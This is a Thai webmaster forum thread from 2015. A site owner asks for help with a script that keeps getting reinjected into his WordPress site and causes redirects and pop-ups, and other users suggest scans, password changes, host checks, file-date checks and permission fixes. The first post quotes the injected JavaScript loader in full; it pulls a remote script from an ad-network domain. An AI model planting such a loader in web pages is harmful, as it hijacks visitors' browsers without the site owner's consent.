ThaiSEOBoard.com

ความรู้ทั่วไป => General (ถามคุยวิชาการ IM) => ข้อความที่เริ่มโดย: kuzawara ที่ 22 กรกฎาคม 2015, 20:21:52


หัวข้อ: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 22 กรกฎาคม 2015, 20:21:52
โค๊ด:
<script type="text/javascript">
var _prvar=_prvar||new Object();
(function(pa,s){if(document.getElementById('pr238904d8'))return false;
pa=document.createElement('script');pa.type='text/javascript';pa.async=true;pa.id='pr238904d8';pa.src='//prscripts.com/pub.js';
s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(pa,s);})();
</script>
--------------------------------------------------------
นี่คือสคลิปที่มันฝังไว้ผมลอง view-source จากหน้าแรก แต่ผมหาตำแหน่งที่จะลบไม่เจอครับ ว่าอยู่ที่ไฟล์ไหน มีวิธีหาโค๊ตที่โดนฝังป่าวครับว่าอยู่ที่ไหน  :P

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: toonytoony2004 ที่ 22 กรกฎาคม 2015, 20:29:50
ผมเดานะครับว่า อาจอยู่ไฟล์ theme หลักครับ หน้า index หรือเปล่าครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 22 กรกฎาคม 2015, 21:23:28
ผมใช้ Theme ของแท้ครับ หาในไฟล์ index ของ theme ไม่เจอครับ มีวิธีหาโค๊ตแปลกปลอมไหมครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: boardseo ที่ 22 กรกฎาคม 2015, 21:30:10
ผมเคยอ่านเจอนะว่าวิธีตรวจว่าไฟล์ไหนติดไวรัส แต่ปัญหาคือผมจะไม่ได้ว่าทำยังไง  :P

ลองอันนี้คร่าวๆได้ไหมครับ https://www.virustotal.com/ หรือไม่ก็ http://www.avgthreatlabs.com/ww-en/website-safety-reports/ :wanwan044:

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: toonytoony2004 ที่ 22 กรกฎาคม 2015, 21:30:40
ผมเคยใช้ Notepad++ หา โดยใช้คำสั่ง Find in Files

ลองดูครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 22 กรกฎาคม 2015, 21:43:48
ลักษณะพอผมใช้ Theme แท้ ทับไปมันจะหาย แล้วผ่านไปซักระยะหนึ่งมันจะมาอีก ประมาณนี้ครับ
เปลี่ยนพาส FTP ก็แล้ว เปลี่ยนพาสเข้าเว็บก็แล้ว ลง Plugin All In One WP Security ตั้งค่า Full Option ก็แล้วยังโดน

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: pinkam0327 ที่ 22 กรกฎาคม 2015, 21:49:45
คุ้นๆ เหมือนจะเคยเจอครับ มันจะรีไดเรคไปหน้าอื่นใช่ไหม?
ของผมมันซ้อนไว้ที่ส่วน <head> ครับ อยู่ใต้โค๊ดของ popads.net(โฆษณา) ลองๆหาดูครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: aodify ที่ 22 กรกฎาคม 2015, 21:51:56
อ้างจาก: kuzawara ที่ 22 กรกฎาคม 2015, 21:43:48
ลักษณะพอผมใช้ Theme แท้ ทับไปมันจะหาย แล้วผ่านไปซักระยะหนึ่งมันจะมาอีก ประมาณนี้ครับ
เปลี่ยนพาส FTP ก็แล้ว เปลี่ยนพาสเข้าเว็บก็แล้ว ลง Plugin All In One WP Security ตั้งค่า Full Option ก็แล้วยังโดน

ผมเคยโดนลักษณะคล้ายๆ แบบนี้  แต่ไม่ใช้เว็บนี้นะคัรบ  เปลี่ยนธีมหาย ใช้ไปสักระยะโค๊ดมันก็จะฝั่งมาในธีมอีก ตอนแรกนึกว่าเป็นที่ตัวโปรแกรม FTP เถื่อนที่ไปหาโหลดมาใช้ เปลี่ยนมาใช้ FileZilla ก็ยังเหมือนเดิม ก็ยังไม่หาย ต้องลบไฟล์ที่เป็น .EXE พวกโปรแกรมต่างๆ ทิ้งทั้งหมด แล้วลงวินโดว์ใหม่ หายเป็นสาบสูญไปเลย

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 22 กรกฎาคม 2015, 22:22:08
มันจะรีไดเรคไปหาเว็บต่างๆ ถ้าเข้ากับมือถือเห็นชัดเลยครับ ถ้าเข้ากับ PC มันจะเด้ง Tab ใหม่ไปเว็บโป๊ต่างๆ นาๆ แล้วแต่จะกรุณา
ผมมาใช้คอมใหม่วินโดว์ใหม่ Win8 ก็ยังไม่หาย ตอนน้ี้มาใช้โปรแกรม FTP = WinSCP เห็นมีคนบอกว่าปลอดภัย ก็ยังไม่หายอีก
ส่วนหาโค๊ตเจอ เอาสกินทับมันหาย แต่เดี๋ยวก็มาอีกครับ เครียดเลย  :wanwan035:

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: jorjee001 ที่ 22 กรกฎาคม 2015, 23:34:04
ปัญหานี้เป็นไปตั้งแต่เครื่องคอมเจ้าของเว็บเอง ยันเซิฟเวอร์โฮส   อาจจะเป็นไวรัสติดจากคอมเจ้าของเว็บเอง  หรือจากสคริปที่ถูกฝังบนโฮสก็ได้
ฉะนั้นเช็คและแก้ไวรัสจากคอมเจ้าของเว็บเองก่อน  หลังจากนั้นเปลี่ยนพาสทั้งหมด  ดูไฟล์ผิดปกติบนโฮส ดูข้อมูลโฮสว่าใช้ซอฟแวร์เก่าไหม มีช่องโหว่ใดๆไหม
แก้กี่ครั้งก็ไม่หายถ้าไม่แก้ที่ต้นเหตุ  ไปรอเปลี่ยนกลับมาคือปลายเหตุ แก้แล้วมันก็มาอีกครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: BrainFreeze ที่ 23 กรกฎาคม 2015, 05:03:07
ถ้าทับไฟล์ไปแล้วหาย รอให้เป็นอีกครั้งครับพอเป็นปุ้บให้ ดู date modify ว่าไฟล์ไหนถูกแก้ล่าสุด ให้ host ช่วยดูก็ได้ครับ
พอเจอแล้วขอ log จาก host ครับว่าไฟล์นี้ใคร modify มาจากไหน ทำไมถึงทำได้ครับ

 :wanwan017:

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: AyFOOO ที่ 23 กรกฎาคม 2015, 05:29:31
เข้ามาเก็บความรู้ครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: qawe89 ที่ 23 กรกฎาคม 2015, 08:27:16
อะไรจะโหดร้าย ขนาดนี้  :-X

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: สมถะมหาทรัพย์ ที่ 23 กรกฎาคม 2015, 09:29:14
โหดอ่าาาาา

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: dingdong8002 ที่ 23 กรกฎาคม 2015, 09:44:36
ผมเคยเจอกรณีคล้ายๆ กันครั้งหนึ่งครับ ปกติก็ใช้บริการของหลายๆ โฮสเพื่อกระจายความเสี่ยงก็ประมาณ 3-5 เจ้าด้วยกัน แต่เมื่อรู้สึกว่าเจ้าไหนทำท่าไม่ดี ก็จะเตรียมย้ายลองเจ้าอื่นๆ ไปทั่ว พอมาดีเจ้าหนึ่ง เราย้ายยกเว็บเลย แล้วแค่วันสองวัน ก็เหมือนมีสคริปแปลกแทรกเข้ามา เราก็จัดการหามันเลย ก็หาแล้วเจอ ลบไป เปลี่ยนยูสเซอร์ พาสกับบริการที่จำเป็นทั้งหลาย สักพักก็เป็นเหมือนเดิม สรุปได้ทันทีว่าเป็นที่โฮสชัวร์ เป็นที่คอมนี่น่าจะยากมากเพราะเป็นคนรอบคอบ และใช้ Mac OS ด้วยแทบจะ 100% เชื่อได้เลยว่าไม่ได้เป็นจากคอมเรา พอเปลี่ยนโฮสก็หายทันใด  :wanwan001:

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: teabreak ที่ 23 กรกฎาคม 2015, 09:51:12
ลองสแกนคอมดูยังครับ อาจมาจากโปรแกรมเถื่อนในคอม(ถ้ามี)

ผมเคยครั้งนึงใช้ share host ถ้ามีเว็บไหนติดมันลามไปแทบทุกเว็บในโฮสเลยครับ  :P

ผมสอบถามโฮสไป โฮสบอกไม่เกี่ยว ลามไปไม่ได้.. อันนี้ผมก็ไม่แน่ใจเหมือนกันว่าลามไปได้มั้ยนะครับ

แต่ตั้งแต่นั้นเลิกใช้แชร์โฮสอีกเลยครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: tenzamak ที่ 23 กรกฎาคม 2015, 10:47:40
ผมทำโฮส โดนด่าเรื่องนี้ค่อนข้างบ่อย  ถ้ามั่นใจว่าสคิปใหม่ อัพเดทแล้ว

เทสง่ายๆ เปลี่ยนพาสหนีแล้วห้าม login ผมเจอหลายเคสมากกรณีนี้ สุดท้ายคุยกับลูกค้า ผมเปลี่ยนพาสนะ ผมไม่ให้พาสใหม่

เชื่อไหมว่าไม่เคยติดไวรัสอีกเลย  update แล้ว ไล่ลบแล้ว ไม่หายก็ควรจะคิดว่าเป็นที่จุดอื่นแล้ว

สแกนคอมสำคัญที่สุด คนชอบมองข้ามกัน ไวรัสพวกนี้มันมากับ ftp ที่คุณใช้


หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 24 กรกฎาคม 2015, 19:35:38
ณ ตอนนี้ยังแก้ปัญหาเจ้าตัว
โค๊ด:
prscripts.com
ไม่ได้ครับ แก้แล้วก็กลับมาอีก จนปัญญาจริงๆ  :P

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: CopterMaster ที่ 24 กรกฎาคม 2015, 20:01:09
ทำเว็บอะไรพอจะบอกได้ไหมครับ เผื่อผมมีสคริป จะได้ให้

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 24 กรกฎาคม 2015, 20:39:47
แนว 18+ ครับ แก้ยังงัยก็ไม่ได้ครับ  :wanwan035:
ผมใช้โปรแกรม winscp หรือเป็นที่โปรแกรมตัวนี้ครับ
โปรแกรมไวรัสของแท้ Nod32,theme wordpress ของแท้ก็ยังไม่ได้

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: sputtaro ที่ 24 กรกฎาคม 2015, 21:00:04
อาจจะมาจากพวก สคริปท์แอดส์ หรือปลั๊กอินแอดส์ อะไรสักอย่าง เพราะผมลองค้นดู มันค่อนข้างสัมพันธ์กับพวกมาลแวร์ที่คุณเจอ
ลองเช็คไอพี นี่ดู https://www.robtex.net/#!dns=69.55.48.114
แต่อย่าเพิ่งเชื่อผมนะ ต้องลองตรวจสอบเองครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 24 กรกฎาคม 2015, 21:14:54
ตรงช่อง dns ให้ใส่ ip ของเว็บผมเหรอครับ


อันนี้คลิ๊กข้างบนเลยครับ ได้แบบนี้
โค๊ด:
check 69.55.48.114 on robtex.com
Reverse records found

โค๊ด:
prpops.com
widget.plugrush.com
mobile.plugrush.com
pornwave.com
prscripts.com
[url=http://www.pornwave.com]www.pornwave.com[/url]
pu.plugrush.com
prwidgets.com
prmobiles.com

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: sputtaro ที่ 24 กรกฎาคม 2015, 21:16:13
ใส่ไอพีนี้ครับ  69.55.48.114

*******************
ช่วยแก้ไข ให้ .com อยู่ห่างๆ จากชื่อเว็บด้วยครับ
เดี๋ยวกลายเป็นสร้างแบคลิ้งให้เว็บโป๊ไป ไม่เป็นผลดีต่อบอร์ด

********************
ได้ชื่อเว็บพวกนั้นแล้ว ลองตรวจสอบดูว่าคุณติดตั้ง อะไรที่เกี่ยวข้องกัน เพราะผมว่า มันคือ มาจากที่เดียวกันหมดนะ
เอาออกก็น่าจะหาย

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 24 กรกฎาคม 2015, 21:21:59
โค๊ด:
check 69.55.48.114 on robtex.com
Reverse records found

prpops.com
widget.plugrush.com
mobile.plugrush.com
pornwave.com
prscripts.com
[url=http://www.pornwave.com]www.pornwave.com[/url]
pu.plugrush.com
prwidgets.com
prmobiles.com

คลิ๊กตามที่ท่านผม ผลออกมาแบบนี้ครับ เว็บผมติดแค่ popads กับ exoclick ส่วนเว็บที่ผมโดนและเจอ คือ
โค๊ด:
prscripts.com
ส่วนที่เหลือน่าโดนด้วยแต่ผมอาจจะไม่รู้
ผมต้องทำยังงัยต่อครับ ต่อจากนี้

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: sputtaro ที่ 24 กรกฎาคม 2015, 21:27:53
เจ้าปลั๊กรัด นี่ตัวทำเงินนะ คุณไม่ได้ติดเหรอ
ลองบล็อกไอพีดูครับ ไม่รู้จะได้ผลไหม

***************
ขออนุญาติแนะนำแค่นี้นะครับ
เพราะผมหมดปัญญาช่วยครับ
ไม่รู้ต้องทำไงต่อเหมือนกันครับ
ต้องรอท่านอื่นๆต่อไปนะครับ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 24 กรกฎาคม 2015, 21:32:25
plugrush เคยติดและลบไปนานแล้ว แต่ทำไมกลับมาอีกครับ
แล้วจะลบจากตรงไหนครับ ผมไม่รู้จริงๆ

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: 24Hrs ที่ 25 กรกฎาคม 2015, 01:18:05
อาจจะมาจาก Plugin Browser Firefoxฯลฯ ก้อ เป็น ด้าย !!
(ความเห็นส่วนตัว เคยเจออีกแบบป่าว มะรุ)

 :wanwan009:

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: tenzamak ที่ 25 กรกฎาคม 2015, 03:27:33
ลองทำตามที่ผมบอกยัง แก้ให้จบทีเดียว แล้วเปลี่ยนพาส ftp แล้วห้ามเข้า

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: JeffyPluS ที่ 25 กรกฎาคม 2015, 07:58:15
+ แจ้งทางโฮส ขอ reset password

+ จัดการที่ต้นตอ คือเครื่องที่ใช้เชื่อมต่อ scan virus ให้ดี

+ download file ลงมาดู หรือ ดู ว่ามีไฟล์ใด ถูกแทรกสคริปท์ แล้วแก้ไข ให้หมดครับ + ไฟล์ใดที่แปลกปลอมเข้ามา ก็ควรลบให้หมด

+ ตั้งค่า permission ใหม่ folder 755 file 644 ครับ

"ไม่ควรตั้ง 777 หรือ 666 all files + folders"

หัวข้อ: Re: โดน hack ครั้งที่ 100 ได้แล้วมั้งครับ ชื่อ prscripts
เริ่มหัวข้อโดย: kuzawara ที่ 25 กรกฎาคม 2015, 09:11:43
พอดีผมทำผ่าน RDP ของ เว็บ
โค๊ด:
Hostdzire.com
ไม่รู้ติดมาจากตัวนี้ป่าว
ตอนนี้แสกนไวรัสเครื่องคอมเราเองเรียบร้อย กำลังดาวโหลดไฟล์มาเช็ดดูครับ
และจะเอาแค่ Folder - Upload อย่างเดียวที่เอาไปอัพโหลดกลับ
ผมใช้ VPS ของเว็บหนึ่งครับ ใช้ Kloxo ไม่รู้เพราะตัว Kloxo ด้วยป่าวครับ
แต่ใช้โปรแกรม FTP Winscp ตอนนี้ ไม่ทราบว่าตัวนี้ปลอดภัยป่าวครับ


SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com